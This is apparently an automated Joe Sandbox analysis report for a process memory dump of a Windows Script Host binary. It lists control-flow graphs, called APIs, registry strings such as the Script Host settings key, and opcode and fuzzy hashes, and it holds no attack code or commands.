                                                                                                                                                control_flow_graph 66 7ff7c0b98348-7ff7c0b983a9 67 7ff7c0b983b3-7ff7c0b983c6 call 7ff7c0b97e44 66->67 68 7ff7c0b983ab-7ff7c0b983ae 66->68 73 7ff7c0b983d2-7ff7c0b983ea GetProcAddress 67->73 74 7ff7c0b983c8-7ff7c0b983cd 67->74 69 7ff7c0b985de-7ff7c0b98605 call 7ff7c0ba3bd0 68->69 73->74 77 7ff7c0b983ec-7ff7c0b98406 GetProcAddress 73->77 76 7ff7c0b985a1-7ff7c0b985a9 74->76 78 7ff7c0b985b1-7ff7c0b985b9 76->78 79 7ff7c0b985ab CloseHandle 76->79 77->74 80 7ff7c0b98408-7ff7c0b98420 GetProcAddress 77->80 81 7ff7c0b985c9-7ff7c0b985cf 78->81 82 7ff7c0b985bb-7ff7c0b985be 78->82 79->78 80->74 83 7ff7c0b98422-7ff7c0b98425 80->83 85 7ff7c0b985d1-7ff7c0b985d6 FreeLibrary 81->85 86 7ff7c0b985dc 81->86 82->81 84 7ff7c0b985c0 82->84 87 7ff7c0b98427-7ff7c0b9846e SysStringLen wcsrchr call 7ff7c0b97b1c 83->87 88 7ff7c0b9847c-7ff7c0b984d0 memset * 2 83->88 84->81 85->86 86->69 94 7ff7c0b98474-7ff7c0b98479 87->94 95 7ff7c0b98593-7ff7c0b98596 87->95 89 7ff7c0b984d2-7ff7c0b984d8 88->89 90 7ff7c0b984da 88->90 89->90 92 7ff7c0b984e1-7ff7c0b984ff IdentifyCodeAuthzLevelW 89->92 90->92 96 7ff7c0b98501-7ff7c0b98515 GetLastError 92->96 97 7ff7c0b98517-7ff7c0b98539 ComputeAccessTokenFromCodeAuthzLevel 92->97 94->88 95->76 100 7ff7c0b98598-7ff7c0b9859b SysFreeString 95->100 96->95 98 7ff7c0b98579-7ff7c0b98581 97->98 99 7ff7c0b9853b-7ff7c0b98564 GetLastError GetProcAddress 97->99 102 7ff7c0b98591 98->102 103 7ff7c0b98583-7ff7c0b9858b ImpersonateLoggedOnUser 98->103 99->95 101 7ff7c0b98566-7ff7c0b98577 99->101 100->76 101->95 102->95 103->96 103->102
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseFreeHandleLibrary
                                                                                                                                                • String ID: SCRIPT$SaferCloseLevel$SaferComputeTokenFromLevel$SaferIdentifyLevel$SaferRecordEventLogEntry$advapi32.dll
                                                                                                                                                • API String ID: 10933145-3460866070
                                                                                                                                                • Opcode ID: ca423e327a28cc9a8b682f4429047f69f7512ddf0a389c0b10475bdbd718699c
                                                                                                                                                • Instruction ID: 0dac7415445f33237d798658b8a589e4fd759e5c6d6f1cbb8de8114a62495062
                                                                                                                                                • Opcode Fuzzy Hash: ca423e327a28cc9a8b682f4429047f69f7512ddf0a389c0b10475bdbd718699c
                                                                                                                                                • Instruction Fuzzy Hash: 7D814421A18B4285E751EF65EC4436AB3B0FB847A4F840136EA4F82B54DF7CF455C7A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 105 7ff7c0b95a34-7ff7c0b95a6a 106 7ff7c0b95a84 105->106 107 7ff7c0b95a6c-7ff7c0b95a6f 105->107 110 7ff7c0b95a8b-7ff7c0b95a97 106->110 108 7ff7c0b95a71-7ff7c0b95a76 107->108 109 7ff7c0b95a7b-7ff7c0b95a82 107->109 111 7ff7c0b95bca-7ff7c0b95bf5 call 7ff7c0ba3bd0 108->111 109->110 112 7ff7c0b95a99-7ff7c0b95acf RegEnumKeyExA 110->112 113 7ff7c0b95ad5-7ff7c0b95ad7 112->113 114 7ff7c0b95b9b-7ff7c0b95baf call 7ff7c0b95934 112->114 118 7ff7c0b95b8c-7ff7c0b95b99 113->118 119 7ff7c0b95add-7ff7c0b95ae2 113->119 114->111 124 7ff7c0b95bb1-7ff7c0b95bc8 call 7ff7c0b95934 114->124 118->111 121 7ff7c0b95b81-7ff7c0b95b87 119->121 122 7ff7c0b95ae8-7ff7c0b95b0d RegOpenKeyExA 119->122 121->112 122->118 123 7ff7c0b95b0f-7ff7c0b95b51 RegQueryValueExA RegCloseKey 122->123 123->121 125 7ff7c0b95b53-7ff7c0b95b59 123->125 124->111 125->121 127 7ff7c0b95b5b-7ff7c0b95b62 125->127 129 7ff7c0b95bf6-7ff7c0b95cc5 call 7ff7c0ba3e74 GetACP 127->129 130 7ff7c0b95b68-7ff7c0b95b7f call 7ff7c0b95934 127->130 136 7ff7c0b95d66-7ff7c0b95d76 call 7ff7c0ba3b74 129->136 137 7ff7c0b95ccb-7ff7c0b95ce6 LoadLibraryExW 129->137 130->111 130->121 145 7ff7c0b95d8f 136->145 146 7ff7c0b95d78-7ff7c0b95d8d 136->146 139 7ff7c0b95d06-7ff7c0b95d12 call 7ff7c0b9dddc 137->139 140 7ff7c0b95ce8-7ff7c0b95cfb GetProcAddress 137->140 150 7ff7c0b95d14-7ff7c0b95d43 call 7ff7c0ba3bd0 139->150 142 7ff7c0b95d44-7ff7c0b95d64 FreeLibrary 140->142 143 7ff7c0b95cfd-7ff7c0b95d00 FreeLibrary 140->143 142->136 142->139 143->139 149 7ff7c0b95d92-7ff7c0b95d95 145->149 146->149 151 7ff7c0b95db3-7ff7c0b95dc7 149->151 152 7ff7c0b95d97-7ff7c0b95dad CoRegisterMessageFilter 149->152 155 7ff7c0b95df5-7ff7c0b95e0b GetModuleFileNameA 151->155 156 7ff7c0b95dc9-7ff7c0b95de0 GetModuleFileNameW 151->156 152->151 154 7ff7c0b95daf 152->154 154->151 155->139 159 7ff7c0b95e11-7ff7c0b95e18 155->159 156->139 158 7ff7c0b95de6-7ff7c0b95dee 156->158 160 7ff7c0b95df0 158->160 161 7ff7c0b95e4c-7ff7c0b95e64 call 7ff7c0b955b4 158->161 159->139 162 7ff7c0b95e1e-7ff7c0b95e46 MultiByteToWideChar 159->162 160->139 165 7ff7c0b95e74-7ff7c0b95e7c call 7ff7c0b970b0 161->165 166 7ff7c0b95e66-7ff7c0b95e72 161->166 162->139 162->161 171 7ff7c0b95e95-7ff7c0b95ebb call 7ff7c0b9d258 165->171 172 7ff7c0b95e7e-7ff7c0b95e90 165->172 167 7ff7c0b95ecc-7ff7c0b95edb 166->167 167->139 176 7ff7c0b95ee0-7ff7c0b95ef8 call 7ff7c0b9d258 171->176 177 7ff7c0b95ebd 171->177 172->139 176->177 181 7ff7c0b95efa-7ff7c0b95f14 call 7ff7c0b9dbec 176->181 178 7ff7c0b95ec3-7ff7c0b95ec9 177->178 178->167 184 7ff7c0b95f16-7ff7c0b95f1b 181->184 185 7ff7c0b95f29-7ff7c0b95f61 181->185 184->139 186 7ff7c0b95f21-7ff7c0b95f27 184->186 187 7ff7c0b95f73-7ff7c0b95f89 185->187 188 7ff7c0b95f63-7ff7c0b95f70 185->188 186->178 189 7ff7c0b95fc4-7ff7c0b95fcb 187->189 190 7ff7c0b95f8b-7ff7c0b95f8d 187->190 188->187 191 7ff7c0b95fdd-7ff7c0b95fe4 189->191 192 7ff7c0b95fcd-7ff7c0b95fd3 189->192 193 7ff7c0b95f8f-7ff7c0b95f9a 190->193 194 7ff7c0b95fbc-7ff7c0b95fbf 190->194 195 7ff7c0b95fea-7ff7c0b96026 GetACP call 7ff7c0b9d30c 191->195 196 7ff7c0b9606b-7ff7c0b96075 191->196 192->191 197 7ff7c0b95fac-7ff7c0b95fb2 193->197 198 7ff7c0b95f9c-7ff7c0b95fa2 193->198 194->139 209 7ff7c0b96032-7ff7c0b9603a 195->209 210 7ff7c0b96028-7ff7c0b9602d call 7ff7c0b95a34 195->210 200 7ff7c0b960a2-7ff7c0b960a9 196->200 201 7ff7c0b96077-7ff7c0b9608b call 7ff7c0b9d30c 196->201 197->194 198->197 204 7ff7c0b960ab-7ff7c0b960b8 call 7ff7c0b95a34 200->204 205 7ff7c0b9610d-7ff7c0b96114 200->205 212 7ff7c0b9603c-7ff7c0b9604f 201->212 213 7ff7c0b9608d-7ff7c0b9609f 201->213 221 7ff7c0b960ba-7ff7c0b960c9 204->221 222 7ff7c0b960cb-7ff7c0b960d2 204->222 207 7ff7c0b9611f-7ff7c0b96127 205->207 208 7ff7c0b96116-7ff7c0b96118 205->208 214 7ff7c0b96129-7ff7c0b96135 207->214 216 7ff7c0b96159-7ff7c0b96161 207->216 208->214 215 7ff7c0b9611a 208->215 209->212 219 7ff7c0b96054-7ff7c0b96066 209->219 210->209 223 7ff7c0b96142-7ff7c0b96154 212->223 213->200 220 7ff7c0b96138-7ff7c0b9613e 214->220 215->207 224 7ff7c0b961e1-7ff7c0b961e6 216->224 225 7ff7c0b96163-7ff7c0b961a2 call 7ff7c0b94654 216->225 219->194 220->223 221->220 229 7ff7c0b960d4-7ff7c0b960db 222->229 230 7ff7c0b9610a 222->230 223->139 227 7ff7c0b9627c-7ff7c0b9628d call 7ff7c0b9dddc 224->227 228 7ff7c0b961ec-7ff7c0b96239 call 7ff7c0b94654 224->228 225->227 239 7ff7c0b961a8-7ff7c0b961ac 225->239 227->150 246 7ff7c0b9626a-7ff7c0b96276 228->246 247 7ff7c0b9623b-7ff7c0b9623e 228->247 236 7ff7c0b960f2 229->236 237 7ff7c0b960dd-7ff7c0b960e4 229->237 230->205 243 7ff7c0b960f8-7ff7c0b96100 236->243 237->139 242 7ff7c0b960ea-7ff7c0b960f0 237->242 244 7ff7c0b961b1-7ff7c0b961b8 239->244 245 7ff7c0b961ae 239->245 242->243 243->230 244->227 248 7ff7c0b961be-7ff7c0b961dc 244->248 245->244 246->227 246->228 249 7ff7c0b96240 247->249 250 7ff7c0b96243-7ff7c0b9624a 247->250 248->227 249->250 250->246 251 7ff7c0b9624c-7ff7c0b96261 250->251 251->246
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$Free$AddressCloseEnumFileFilterLoadMessageModuleNameOpenProcQueryRegisterValue_malloc_dbg
                                                                                                                                                • String ID: .$HeapSetInformation$Open$Open2$WSFFile$WSHFile$kernel32.dll
                                                                                                                                                • API String ID: 1744760138-732722162
                                                                                                                                                • Opcode ID: daf42796b38901f2363d6b50b042cefec1de9c6f04d96012c93868aeec878bd3
                                                                                                                                                • Instruction ID: 11478f59a68b2723bd2b2bbaabd04c2802a45b7a2d758829f02f08d94bfc5244
                                                                                                                                                • Opcode Fuzzy Hash: daf42796b38901f2363d6b50b042cefec1de9c6f04d96012c93868aeec878bd3
                                                                                                                                                • Instruction Fuzzy Hash: 94B19532A08B8286EB61EF21ED446A9B7A4FF447A4F840035DA4E87B54DF3CF555C7A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 317 7ff7c0b96cec-7ff7c0b96d34 318 7ff7c0b96f75-7ff7c0b96fa4 call 7ff7c0ba3bd0 317->318 319 7ff7c0b96d3a-7ff7c0b96da6 call 7ff7c0ba134c * 2 317->319 326 7ff7c0b96da8-7ff7c0b96db9 call 7ff7c0b96c50 319->326 327 7ff7c0b96dcb-7ff7c0b96dd5 call 7ff7c0b96c50 319->327 332 7ff7c0b96dbf-7ff7c0b96dc9 326->332 333 7ff7c0b96f4c-7ff7c0b96f5d SysFreeString 326->333 331 7ff7c0b96dda-7ff7c0b96ddc 327->331 331->333 334 7ff7c0b96de2-7ff7c0b96de8 331->334 337 7ff7c0b96dee-7ff7c0b96e03 RegisterEventSourceW 332->337 335 7ff7c0b96f5f RegCloseKey 333->335 336 7ff7c0b96f65-7ff7c0b96f6d 333->336 334->337 335->336 336->318 338 7ff7c0b96f6f RegCloseKey 336->338 337->333 339 7ff7c0b96e09-7ff7c0b96e1a GetUserNameW 337->339 338->318 340 7ff7c0b96e20-7ff7c0b96e53 LookupAccountNameW 339->340 341 7ff7c0b96ecd-7ff7c0b96ee5 call 7ff7c0ba09cc 339->341 340->341 343 7ff7c0b96e55-7ff7c0b96e59 340->343 346 7ff7c0b96ef1-7ff7c0b96ef5 341->346 347 7ff7c0b96ee7-7ff7c0b96eef 341->347 343->341 345 7ff7c0b96e5b-7ff7c0b96e8a call 7ff7c0ba3b74 * 2 343->345 345->341 358 7ff7c0b96e8c-7ff7c0b96e8f 345->358 349 7ff7c0b96ef9-7ff7c0b96f35 ReportEventW DeregisterEventSource 346->349 347->349 352 7ff7c0b96f3f-7ff7c0b96f42 349->352 353 7ff7c0b96f37-7ff7c0b96f3a call 7ff7c0ba3bb0 349->353 352->333 354 7ff7c0b96f44-7ff7c0b96f47 call 7ff7c0ba3bb0 352->354 353->352 354->333 359 7ff7c0b96e91-7ff7c0b96ec0 LookupAccountNameW 358->359 360 7ff7c0b96ec2-7ff7c0b96eca call 7ff7c0ba3bb0 358->360 359->341 359->360 360->341
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00007FF7C0BA134C: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA1398
                                                                                                                                                  • Part of subcall function 00007FF7C0BA134C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA13EC
                                                                                                                                                  • Part of subcall function 00007FF7C0BA134C: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA13F9
                                                                                                                                                  • Part of subcall function 00007FF7C0BA134C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA144B
                                                                                                                                                  • Part of subcall function 00007FF7C0BA134C: RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA146E
                                                                                                                                                • RegisterEventSourceW.ADVAPI32 ref: 00007FF7C0B96DF7
                                                                                                                                                • GetUserNameW.ADVAPI32 ref: 00007FF7C0B96E12
                                                                                                                                                • LookupAccountNameW.ADVAPI32 ref: 00007FF7C0B96E47
                                                                                                                                                • LookupAccountNameW.ADVAPI32 ref: 00007FF7C0B96EB8
                                                                                                                                                • ReportEventW.ADVAPI32 ref: 00007FF7C0B96F23
                                                                                                                                                • DeregisterEventSource.ADVAPI32 ref: 00007FF7C0B96F2C
                                                                                                                                                • SysFreeString.OLEAUT32 ref: 00007FF7C0B96F4F
                                                                                                                                                • RegCloseKey.KERNELBASE ref: 00007FF7C0B96F5F
                                                                                                                                                • RegCloseKey.ADVAPI32 ref: 00007FF7C0B96F6F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: EventName$AccountByteCharCloseLookupMultiOpenSourceWide$DeregisterErrorFreeLastRegisterReportStringUser
                                                                                                                                                • String ID: LogSecurityFailures$LogSecuritySuccesses$Software\Microsoft\Windows Script Host\Settings$Windows Script Host
                                                                                                                                                • API String ID: 2014086341-2261343319
                                                                                                                                                • Opcode ID: 6fe26e5a0ddc8785e7e43a44a4b79e1a559761a7abaa2fc167fb4ce248d846b9
                                                                                                                                                • Instruction ID: 3fe3c68cf7fc2f34fb6eb102bf1a51b0dd13c27bec4d37703d97b54d71f634be
                                                                                                                                                • Opcode Fuzzy Hash: 6fe26e5a0ddc8785e7e43a44a4b79e1a559761a7abaa2fc167fb4ce248d846b9
                                                                                                                                                • Instruction Fuzzy Hash: FC715032A09B4286EB11EF61E8441BAF7A4FF447A4F840135EA8E87BA4DF3CE415C750
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Timer$ErrorKillLast$EnumMessageNtdllPostProc_QuitThreadWindowWindows
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3251721287-0
                                                                                                                                                • Opcode ID: b633e85a7e241a76815672620d3c7b209afcb3efed8e02987da59c875c170d9f
                                                                                                                                                • Instruction ID: 6b4931a86502be17494b3bfcf86a6c868f797d8331cc4aedac7b4c12617eb8a0
                                                                                                                                                • Opcode Fuzzy Hash: b633e85a7e241a76815672620d3c7b209afcb3efed8e02987da59c875c170d9f
                                                                                                                                                • Instruction Fuzzy Hash: 53418E61A0860282E654FF29D884138A6B0FF44BA1FA44035CA4FC7F94DF3CF8A182E0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CreateErrorLast$ByteCharMappingMultiSizeViewWide
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 677022515-0
                                                                                                                                                • Opcode ID: a4c1fac4adeb7bf5e841ef01c412abfeacc7114988fec13d3c0b38ca06d5f2f2
                                                                                                                                                • Instruction ID: 47e31245ff35b779700bcda986f6c322d6efa0db7c963a74881df35934fb852c
                                                                                                                                                • Opcode Fuzzy Hash: a4c1fac4adeb7bf5e841ef01c412abfeacc7114988fec13d3c0b38ca06d5f2f2
                                                                                                                                                • Instruction Fuzzy Hash: 0851C532A18B4286E765DF25D81436AA2D0FB487B8F544335DA5E86BD4DF3CE4248790
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 600 7ff7c0ba1a34-7ff7c0ba1a71 601 7ff7c0ba1a73-7ff7c0ba1aa0 RegQueryValueExW 600->601 602 7ff7c0ba1adc-7ff7c0ba1adf 600->602 605 7ff7c0ba1ad0-7ff7c0ba1ad7 601->605 606 7ff7c0ba1aa2 601->606 603 7ff7c0ba1ae5-7ff7c0ba1b0e WideCharToMultiByte 602->603 604 7ff7c0ba1b6e 602->604 608 7ff7c0ba1b10-7ff7c0ba1b1b GetLastError 603->608 609 7ff7c0ba1b1d-7ff7c0ba1b24 603->609 610 7ff7c0ba1b71-7ff7c0ba1ba1 RegQueryValueExA 604->610 607 7ff7c0ba1c09-7ff7c0ba1c0c 605->607 611 7ff7c0ba1aa5-7ff7c0ba1aac 606->611 612 7ff7c0ba1c0f-7ff7c0ba1c11 607->612 608->611 613 7ff7c0ba1b30-7ff7c0ba1b6a call 7ff7c0ba40c0 WideCharToMultiByte 609->613 614 7ff7c0ba1b26 609->614 610->606 615 7ff7c0ba1ba7-7ff7c0ba1bac 610->615 616 7ff7c0ba1aaf-7ff7c0ba1acf call 7ff7c0ba3bd0 611->616 617 7ff7c0ba1c21-7ff7c0ba1c26 612->617 618 7ff7c0ba1c13-7ff7c0ba1c16 612->618 613->610 631 7ff7c0ba1b6c 613->631 614->613 620 7ff7c0ba1bb8-7ff7c0ba1bc0 615->620 621 7ff7c0ba1bae-7ff7c0ba1bb3 615->621 617->616 623 7ff7c0ba1c33-7ff7c0ba1c4f call 7ff7c0ba08c0 618->623 624 7ff7c0ba1c18-7ff7c0ba1c1b 618->624 626 7ff7c0ba1c93-7ff7c0ba1c9b call 7ff7c0ba3e74 620->626 627 7ff7c0ba1bc6-7ff7c0ba1bd3 620->627 621->616 639 7ff7c0ba1c51-7ff7c0ba1c6a call 7ff7c0ba08c0 623->639 640 7ff7c0ba1c87 623->640 624->617 630 7ff7c0ba1c1d-7ff7c0ba1c1f 624->630 633 7ff7c0ba1bd5-7ff7c0ba1bd9 627->633 634 7ff7c0ba1bdb-7ff7c0ba1c03 MultiByteToWideChar 627->634 630->617 636 7ff7c0ba1c2b-7ff7c0ba1c31 630->636 631->608 633->612 634->607 634->608 638 7ff7c0ba1c89-7ff7c0ba1c8e 636->638 638->616 639->640 643 7ff7c0ba1c6c-7ff7c0ba1c85 call 7ff7c0ba08c0 639->643 640->638 643->638 643->640
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$QueryValue$CaptureContextEntryErrorFunctionLastLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                • String ID: false
                                                                                                                                                • API String ID: 886426149-734881840
                                                                                                                                                • Opcode ID: f3c35b03c21a127fca322f538f188cf2bff3ea4f782f9762f9d45d8659069629
                                                                                                                                                • Instruction ID: a2beee3173e64e824054daef45ad4991459fe29b404fc5be36880f73a5f0bf0e
                                                                                                                                                • Opcode Fuzzy Hash: f3c35b03c21a127fca322f538f188cf2bff3ea4f782f9762f9d45d8659069629
                                                                                                                                                • Instruction Fuzzy Hash: 7461A832A0968296E761EF209C402B9A391FB44774FD04735DA6E8ABD4EF3CF565C360
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Close$CreateHandleThread$ChangeCurrentErrorEventFindLastMessageNotificationPost_malloc_dbg
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2839672009-0
                                                                                                                                                • Opcode ID: 34be2e6c7270c755f925dc974c5d37c4b09d32dfab03a69e4b4c014137943224
                                                                                                                                                • Instruction ID: 1494377e5c559c31c4912e473d9e3f7c826ff50560347e9abf695b2f7024c507
                                                                                                                                                • Opcode Fuzzy Hash: 34be2e6c7270c755f925dc974c5d37c4b09d32dfab03a69e4b4c014137943224
                                                                                                                                                • Instruction Fuzzy Hash: CA414762A19B0282EB55FF21E850339A2B1EF84B64F954535DA4E86B94DF3CE41082E0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • RegCreateKeyExW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7C0B9D27D), ref: 00007FF7C0BA1502
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7C0B9D27D), ref: 00007FF7C0BA1547
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7C0B9D27D), ref: 00007FF7C0BA1554
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7C0B9D27D), ref: 00007FF7C0BA15AA
                                                                                                                                                • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7C0B9D27D), ref: 00007FF7C0BA15D8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharCreateMultiWide$ErrorLast
                                                                                                                                                • String ID: Software\Microsoft\Windows Script Host\Settings
                                                                                                                                                • API String ID: 3494534822-2126348837
                                                                                                                                                • Opcode ID: ddc53624f6f18bdc7fa86a126e217078bd4e8b6c1a540d8d6138741a87631fd4
                                                                                                                                                • Instruction ID: 77e3f311bc64bb627c30941a76e7b5357f6af0f8b17d4007cc80d9725a601f05
                                                                                                                                                • Opcode Fuzzy Hash: ddc53624f6f18bdc7fa86a126e217078bd4e8b6c1a540d8d6138741a87631fd4
                                                                                                                                                • Instruction Fuzzy Hash: 0F41B372A18B9286D751DF21AC4056AB3E4FB847B0B941739EA9F82FD4CF3CE4608750
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
